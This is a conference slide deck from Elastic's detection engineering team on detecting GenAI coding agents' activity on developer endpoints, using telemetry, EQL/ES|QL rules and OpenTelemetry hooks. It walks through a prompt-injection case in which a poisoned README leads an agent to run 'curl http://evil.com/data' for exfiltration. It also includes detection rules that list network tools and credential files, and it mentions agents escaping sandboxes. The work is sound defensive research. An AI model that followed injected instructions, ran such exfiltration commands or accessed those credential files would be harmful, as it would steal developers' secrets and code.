[un]prompted - The AI Practitioner Conference

"Can You See What
Your AI Saw?"

GenAI Endpoint Observability for Detection Engineers

Mika Ayenson, Ph.D.  ·  Detection Engineering @ Elastic

Mika Ayenson

$ whoami_

About Me

Mika Ayenson, Ph.D.

TRaDE Team Lead @ Elastic

Leads Threat Research & Detection Engineering (TRaDE)

10+ years in security research & cyber experimentation

Automates everything, family-motivated efficiency nerd

ayenson.com github.com/Mikaayenson linkedin.com/in/mika-ayenson x.com/stryker0x

The Landscape Won't Stop Growing

New GenAI tools, agents, and frameworks ship daily. Detection engineering can't keep up with enumeration.

Cursor · Claude Code · GitHub Copilot · ChatGPT · Windsurf · Devin · Gemini Code Assist · Amazon Q · Tabnine · Codeium · Replit Agent · Sourcegraph Cody · JetBrains AI · Aider · Continue · Sweep · OpenHands · Codium · LangChain · LangGraph · CrewAI · AutoGen · OpenAI Agents SDK · Semantic Kernel · DSPy · Instructor · Pydantic AI · Agno · SmolAgents · Mastra · Anthropic Computer Use · Browser Use · Playwright MCP · Stagehand · Browserbase · Steel · AgentQL · Lovable · Bolt.new · v0 · Tempo · Softgen · Firebase Studio · Figma Make · vLLM · Ollama · SGLang · TensorRT-LLM · llama.cpp · LM Studio · Jan · Msty · GPT4All · MemO · Letta · Zep · LangMem · Cognee · Graphiti · Hypergol · Keywords AI · OpenRouter · Portkey · Helicone · LiteLLM · E2B · Daytona · Modal · Runloop · Morph · Cognition · Poolside · Magic · Factory AI · and counting...

190+ tools across 14 categories — and this was last week's count.

Source: Morph AI Coding Agent Dev Tools map · LLMDevs community

REAL WORLD · r/vscode · 2026

"I have no idea which extension it could be"

A VS Code user discovers one of their extensions is silently connecting to livefootballtickets.com. Extensions from Microsoft, Anthropic, GitHub — all trusted publishers. No new installs. No idea which one.

Reddit post about suspicious VS Code extension
VS Code firewall prompt for livefootballtickets.com

The detection gap

Users install tools faster than they can audit them. Extensions run with ambient authority. When something goes wrong — they can't even identify the source.

Your Devs Are Running These.
Right Now. On Your Endpoints.

85%
of devs regularly use AI coding tools
22%
of merged code is AI-authored
55%
are "heavy users" (76%+ of coding time)

These tools spawn shells, write files, and make network calls. And your EDR has no idea an AI is driving.

JetBrains Dev Ecosystem 2025 · DX AI-Assisted Engineering Q4 2025 · ACTI Agentic Coding Survey Jan 2026

TELEMETRY INSIGHTS · DNS   |   START HERE | CHEAPEST TELEMETRY

Top LLM Endpoints by Host Count

Source: Events.dns.question.name  ·  Metric: unique host.id · DNS/network is the fastest path to visibility

Unique
Hosts
api.anthropic.com27.77%
chatgpt.com23.86%
claude.ai20.61%
api.openai.com10.63%
gemini.googleapis.com3.47%
api-inference.huggingface.co2.17%
copilot.microsoft.com1.74%
perplexity.ai1.52%
openai.azure.com1.30%
others (groq, deepseek, ...)6.93%
TELEMETRY INSIGHTS · CODE SIGNATURE

Signed vs Unsigned Binaries → LLM Endpoints

Source: process.code_signature.exists + process.code_signature.status  ·  Metric: unique host.id

98.5% signed + trusted
CODE SIGNATURE · 131 UNIQUE HOSTS
Signed + Trusted129 hosts · 98.47%
Unsigned (no signature)2 hosts · 1.53%

Only 2 out of 131 hosts ran unsigned binaries

Nearly every process connecting to LLM APIs is signed and trusted. An unsigned binary reaching an LLM endpoint is an immediate anomaly worth investigating.

Detection rule: Alert on any process where process.code_signature.exists == false connecting to known LLM domains.
TELEMETRY INSIGHTS · PROCESS ANCESTRY

Top Processes Spawned by GenAI Tools

Mostly signed, mostly legitimate. The unsigned ones are buried in the noise — and that's the problem.

git
3,400+
gh
720+
node
490+
rg
400+
bash
240+
jq
194
python
170+
kubectl
90

AVG COMMAND LINE LENGTH

48K

chars · zsh via claude · macOS

Top by OS:
macOS zsh→claude: 48K
Linux bash→cursor: 3K
Windows pwsh→codex: 2.3K

⚠ Caveat

Long cmdlines = indicator, but LLMs generate multi-pipe chains that defeat entropy-based detection

TELEMETRY INSIGHTS · FILE MODIFICATION

GenAI File Write Activity

What GenAI tools and their descendants write to disk, by unique host.id

omni → .md
9 hosts
go → .md
3 hosts
codex → .py
3 hosts
claude → .txt
2 hosts
claude → .tmp
2 hosts
Claude → .json
2 hosts
go → .yaml
2 hosts
git → .json
2 hosts
Python → .jsonl
2 hosts

Autonomous file writes

GenAI tools write code, configs, temp files, and data to disk without explicit user action. The subset targeting .json, .yaml, .md configs is a persistence surface.

Notable patterns

omni (Cursor) writes .md across 9 hosts
codex writes .py files directly
claude creates .tmp staging files
copilot-language-server writes to .db
Detection angle: Monitor file writes to AI config paths by unexpected processes.
TELEMETRY INSIGHTS · DETECTION SIGNALS

Real Signals from Production Telemetry

Credential Access via GenAI

credentials.db via Python15 hosts
credentials via claude4 hosts
Cookies via claude2 hosts
logins.json via claude.exe1 host
azureProfile.json via jq4 hosts

Suspicious URLs via GenAI Shell

webhook.site · zsh via claude
api.telegram.org · bash via node
polymarket.com · 30 events via claude
hackerone.com · zsh via claude
Raw IPs: 35.178.x, 52.56.x, 162.243.x

Persistence via GenAI Tool

PlistBuddy → Terminal.plist6 hosts
defaults → Terminal.plist6 hosts
watchman → watchman.plist1 host
powershell → AutoMuteGames.lnk1 host

Unusual DNS from GenAI Processes

Cursor Helper → hcaptcha.com
Cursor Helper → supabase.co
Cursor Helper → intercom
Claude → microsoft365.mcp.claude.com
codex → grafana-mcp.osend.io
01

The Problem

Your alert fired. A suspicious process ran. Good luck figuring out if a human or an LLM did it.

...the problem, again

From the presentation right before this one.

Claude Code running forensics on a SIFT workstation

"Find evil in base-rd01-cdrive.E01 and write a comprehensive report..."

THE CORE QUESTION

Intent Attribution Is Broken

Developer AI Agent /bin/zsh curl http://evil.com/exfil pid: 48291 · user: developer ? WHO? IDENTICAL TELEMETRY

Same PID, same user, same command line. Nearly identical telemetry. Looking at raw events, it's extremely difficult to tell them apart.

Threat Model

Prompt Injection Hidden instructions in context OWASP MCP06 Malicious MCP Server Poisoned tool schemas OWASP MCP03 AI-Assisted Attack Adversary uses coding tools LIVING OFF THE AI Trojanized AI Tools Fake MCP servers, malicious skills COMMODITY INFOSTEALER AI Agent executes tools Developer Endpoint API keys · SSH keys · Source code Cloud credentials · Browser data YOUR DEV'S LAPTOP

OWASP MCP Top 10 (2025) · VirusTotal: From Automation to Infection (Feb 2026)

Attack in Action

A poisoned repo file tricks the AI agent into exfiltrating data — all through legitimate-looking process chains.

1 · INJECTION 2 · INGESTION 3 · EXECUTION 4 · IMPACT 📄 Poisoned README.md hidden instructions 🤖 AI Agent reads context window follows injected prompt Tool: Shell bash -c "curl ..." spawns real process 💀 Exfiltration curl http://evil.com/data secrets, source, keys What EDR sees: Cursor Helper → zsh → curl http://evil.com/data No link to the poisoned file. No prompt context. No AI attribution.

The entire chain looks like a developer running curl. Without prompt-level telemetry, the poisoned context is invisible.

02

Current Telemetry

What does endpoint telemetry actually give us when AI tools run commands?

What EDR Sees Today

Visible

Process spawns with ancestry chains

File events: creates, writes, deletes

Network / DNS: cheapest, most actionable

User context: uid, session, root = suspicious

Runtime scrutiny: node, npm, deno spawns

vs

New Observability Opportunities

The prompt that triggered it

Model reasoning for the command

Shell builtins: no child process

MCP tool identity: which server?

Human vs. AI intent boundary

Where Detection Breaks Down

Human or AI?

No field distinguishes "Cursor Agent spawned this" from "user typed it." process.parent.name is all there is. How would you enrich that?

Sandbox bypass

AI agents can self-escalate from sandboxed to unsandboxed execution. How would you even detect that privilege transition?

Cross-session context loss

AI tools operate session-based. New session, clean slate. If an attacker starts fresh, your forensic chain breaks. How do you correlate across sessions?

Which MCP server ran that?

MCP servers spawn processes through node or python3. The server identity isn't in process metadata. How do you attribute the tool?

Process Ancestry Chain

Cursor.app Electron IDE Cursor Helper (Plugin) Extension host /bin/zsh AI-spawned shell curl http://evil.com/exfil EDR SEES process.name: curl parent: /bin/zsh grandparent: Cursor Helper user: developer EDR CANNOT SEE which prompt triggered it whether user approved agent mode vs manual
03

Detection Opportunities

Process telemetry gives you more than you'd think. Here's where the signal is.

Why parent.name Isn't Enough

Direct child only

// Catches 1 level, misses grandchildren process where event.type == "start" and process.parent.name in ( "claude", "cursor", "Cursor Helper (Plugin)" ) and process.name in ("curl", "wget", "nc")

Full ancestry walk

// Walks entire tree, any depth process where event.type == "start" and descendant of [ process where process.parent.name in ( "claude", "cursor", "Cursor Helper (Plugin)" ) ] and process.name in ("curl", "wget", "nc")

Source: production Elastic Defend rules

PRODUCTION ES|QL | THE KEY TECHNIQUE

Entity ID Intersection

// detection-rules: Suspicious Network or Recon Activity via GenAI Descendant FROM logs-endpoint.events.process-* | WHERE event.type == "start" AND process.Ext.ancestry IS NOT NULL | EVAL is_genai_spawn = process.parent.name IN ("claude", "cursor", "Cursor Helper", "copilot", "windsurf" /* ... */), genai_entity_id = CASE(is_genai_spawn, process.parent.entity_id, NULL) | INLINE STATS all_genai_entity_ids = VALUES(genai_entity_id) WHERE genai_entity_id IS NOT NULL | EVAL genai_ancestor_ids = MV_INTERSECTION(all_genai_entity_ids, process.Ext.ancestry) // ← entity_id ∩ entity_id | WHERE genai_ancestor_ids IS NOT NULL AND NOT is_genai_spawn // exclude direct children (grandchildren+ only) AND process.name IN ("curl", "wget", "nc", "nmap", "whoami", "ssh" /* ... */)
GenAI entity_ids [ent_A, ent_B, ent_C] collected via INLINE STATS process.Ext.ancestry [ent_X, ent_A, ent_Y, ent_Z] full ancestry of suspicious proc = [ent_A] PROOF
ELASTIC DEFEND | THE MCP PROBLEM

MCP Server Detection

// Catches MCP servers spawning shells or utilities process where event.type == "start" and process.parent.name in ("node", "python3", "deno") and process.parent.command_line like~ ("*mcp*", "*mcp-server*", "*mcp_server*") and ( process.name in ("bash", "zsh", "sh") and process.args == "-c" or process.name in ("curl", "git", "powershell.exe") )

What's Detectable

  • MCP server spawns a shell with -c
  • Pattern match on *mcp* in parent cmdline

What's still missing

  • Which MCP tool was invoked
  • MCP server identity or trust level
EQL · CREDENTIAL ACCESS + COLLECTION

GenAI Process Accessing Sensitive Files

file where event.action in ("open", "creation", "modification") and event.outcome == "success" // GenAI process by name and process.name in ( "claude", "cursor", "copilot", "codex", "ollama", "gpt4all", "gemini-cli", "llama-server" /* ... */ ) // Sensitive credential & config files and file.name like~ ( "logins.json", "Login Data", "cookies.sqlite", "credentials", "accessTokens.json", "login.keychain-db", "known_hosts", ".bashrc", ".zshrc" /* ... */ )
GenAI Process cursor · claude · copilot ollama · codex · gemini-cli file event Sensitive File Access credentials · accessTokens.json login.keychain-db · .bashrc ALERT High severity (73) T1555 · T1005

What's Shippable Today

TacticRuleType
ExecutionGenAI/MCP Child Process ExecutionBBR · EQL
ExecutionSuspicious Activity via GenAI DescendantES|QL + EQL
C2GenAI Connection to Unusual Domainnew_terms
Credential AccessSensitive File Access + auto kill_processEQL sequence
PersistenceLaunchAgents / rc.local / Startup modificationEQL sequence
Defense EvasionUnusual Process Modifying GenAI Confignew_terms

Cross-platform: macOS, Linux, Windows  ·  Elastic Defend rules include automated prevention responses

Detection Rules vs. Hunting

Detection Rules

Real-time

EQL descendant of · maxspan=1m

Auto-response: kill_process

Threat Hunting

Batch / Historical

ES|QL INLINE STATS + MV_INTERSECTION

Hours of history · surface anomalies

Use both. Elastic Defend kills in real-time. SIEM detection rules find what slipped past.

Simplest starting point: Flag known LLM process names (cursor, claude, copilot) via process metadata and mark every subprocess as AI-descended.

04

Where the Industry Needs to Go

Today's best option is process.parent.name and command_line heuristics. That's not good enough.

The Gaps

Every production rule today is a workaround for telemetry that should exist but doesn't.

ENDPOINT OPPORTUNITIES ✗ AI tool identity: guessed from parent ✗ Agent mode vs. manual: invisible ✗ The prompt that triggered the action ✗ MCP server name: command_line only ✗ User approval state PROVIDER OPPORTUNITIES ✗ Guardrail evaluation results ✗ Tool-use decisions / reasoning ✗ Content policy violation flags ✗ Model refusal events ✗ Token-level tool call attribution OWASP MCP08: Lack of Audit and Telemetry (Top 10 Risk)

Risks Still on the Table

PII & API Key Exposure

  • Capturing prompts means logging what devs type: PII, secrets, API keys
  • Prompt telemetry creates a new exfil surface
  • gen_ai.content.prompt needs redaction before SIEM

Cross-Session Blind Spots

  • New session = clean slate. Forensic trail is gone
  • No session correlation ID in endpoint telemetry
  • Can't reconstruct the AI's full decision chain

More telemetry is good. But it introduces new compliance and forensic challenges that need to be solved simultaneously.

EMERGING CAPABILITY

Agent Hooks = Telemetry Source

All major AI coding tools now expose lifecycle hooks: shell commands that fire at key agent events. These are a direct telemetry pipeline for what EDR can't see.

Claude Code

PreToolUse · PostToolUse
SessionStart / End
UserPromptSubmit
PermissionRequest
SubagentStart / Stop

Cursor

beforeShellExecution
afterFileEdit
beforeMCPExecution
sessionStart / End
afterAgentResponse

GitHub Copilot

preToolUse · postToolUse
sessionStart / End
userPromptSubmitted
errorOccurred
 
AI Tool Event PreToolUse fires Hook Script captures prompt + tool + context OTel / Syslog gen_ai.* spans + events SIEM + EDR Alerts AI attribution on every alert
APPLICATION MONITORING · OTEL

OTel Application Monitoring Bridges the Gap

EDR sees processes. APM sees intent. gen_ai.* semantic conventions connect them.

gen_ai.* Semantic Conventions

gen_ai.client.token.usage: token consumption
gen_ai.client.operation.duration: latency
gen_ai.server.time_to_first_token
gen_ai.client.inference.operation.details
gen_ai.evaluation.result: guardrails

MCP Trace Context

params._meta propagates trace IDs across tools
Correlate: prompt → tool decision → process spawn
Link AI agent session to endpoint alert

Upstream Work Happening Now

OTel Python SDK → gen_ai conventions v1.37+
Elastic ECS RFC 0052: gen_ai.* field mapping
Endpoint native GenAI observability requested
Hook → OTel → SIEM pipeline prototyping

The Vision

Hook captures PreToolUse → OTel gen_ai.client.inference → enriches endpoint alert with AI attribution → detection rule correlates both

OpenTelemetry GenAI Conventions

Claude Code already ships OTel natively: 8 metrics + 5 event types via claude_code.* namespace. The gen_ai.* spec provides a standard. Most teams aren't ingesting either yet.

OTel gen_ai.* Spec

gen_ai.agent.id

gen_ai.operation.name

gen_ai.provider.name

MCP via params._meta

Industry standard, not yet widely adopted

Claude Code claude_code.*

claude_code.token.usage

claude_code.cost.usage

claude_code.session.count

+ tool_result, api_request events

Own namespace, ships today

Still missing for security

Spawn correlation ID

Guardrail decision context

Cursor, Copilot: no OTel

Gap is narrowing

Where the Industry Should Head

// One JSON blob transforms a generic alert into an AI-attributable event { "process.parent.ai_tool.name": "cursor", "process.parent.ai_tool.mode": "agent", // agent | ask | edit | manual "gen_ai.session.id": "sess_abc123", "gen_ai.tool.name": "Shell", "gen_ai.tool.mcp_server": "filesystem-server", "gen_ai.tool.user_approved": true, "gen_ai.guardrail.decision": "allowed", "gen_ai.model.provider": "anthropic", "gen_ai.process.correlation_id": "proc_corr_001" }
Today: Generic process alert "curl ran." "User: developer. That's all." Future: AI-attributable event "cursor agent ran curl via MCP." "User approved. Session: sess_abc123." + anomaly detection on CPU, token usage, session length

Provider Logs = Security Telemetry

User Prompt input Guardrail block / allow Model inference Tool Use decision Endpoint Exec process spawn EDR SIEM / SOC Agent Hooks · OTel gen_ai.* · Application Monitoring PreToolUse · SessionStart · token.usage · operation.duration · tool invocation events Previously invisible to security teams Now capturable via hooks + OTel → forwarded to SIEM alongside EDR alerts

Guardrail blocks, tool-use decisions, refusal events: these are security signals. Most are trapped in vendor dashboards.

Claude Code is the exception. It exports OTel metrics and events natively: session duration, token usage, tool results, API errors. Proof providers can do it.

05

Takeaways

Reduce the Attack Surface

Before writing rules, reduce what you need to detect.

Asset Inventory First

Know which GenAI tools are on your fleet
Track: Cursor, Claude Code, Copilot, Windsurf, Codex
ps aux | grep -E "cursor|claude|copilot"
If you don't know it's running, you can't secure it

Browser vs. Native Client

Browser-based AI (Gemini web, ChatGPT web) = sandboxed
Native clients (Claude Code, Cursor) = full endpoint access
Pushing users to browser reduces shell/file risk
Attacker must bypass browser sandbox first

Scrutinize Runtimes

Monitor node, npm, deno execution as GenAI descendants
GenAI running as root = immediate flag
Apply network controls: block unexpected LLM domains

DNS/Network First

Cheapest, most actionable telemetry source
Faster than parsing 48K-char command lines
Block or alert on suspicious domains per policy
NGFWs already classify GenAI traffic (FortiGate, Palo Alto App-ID) — detect & block without an agent
Then layer process ancestry and file monitoring

Recap: The Path Forward

A maturity progression. Start where you are, build toward full observability.

1. Visibility

▸ Inventory GenAI tools on your fleet
▸ DNS queries to LLM endpoints
▸ Process ancestry from AI parents
▸ Who is using what, and how much?

TODAY: use existing telemetry

2. Guardrails

▸ Detection rules for intent, not just tools
▸ Network controls on LLM domains
▸ NGFW app control: GenAI category for policy enforcement
▸ Browser/sandbox policies where possible
▸ Scrutinize root, node, unsigned binaries

NEXT: active detection & policy

3. Full Observability

▸ OTel gen_ai.* semantic conventions
▸ Agent hooks (PreToolUse, SessionStart)
▸ Anomaly detection on metrics (CPU, tokens)
▸ Prompt → tool → process correlation

LONG TERM: OTel, hooks, APM

Thanks

Mika Ayenson, Ph.D.

TRaDE Team Lead  ·  Elastic

linkedin.com/in/mika-ayenson

[un]prompted - The AI Practitioner Conference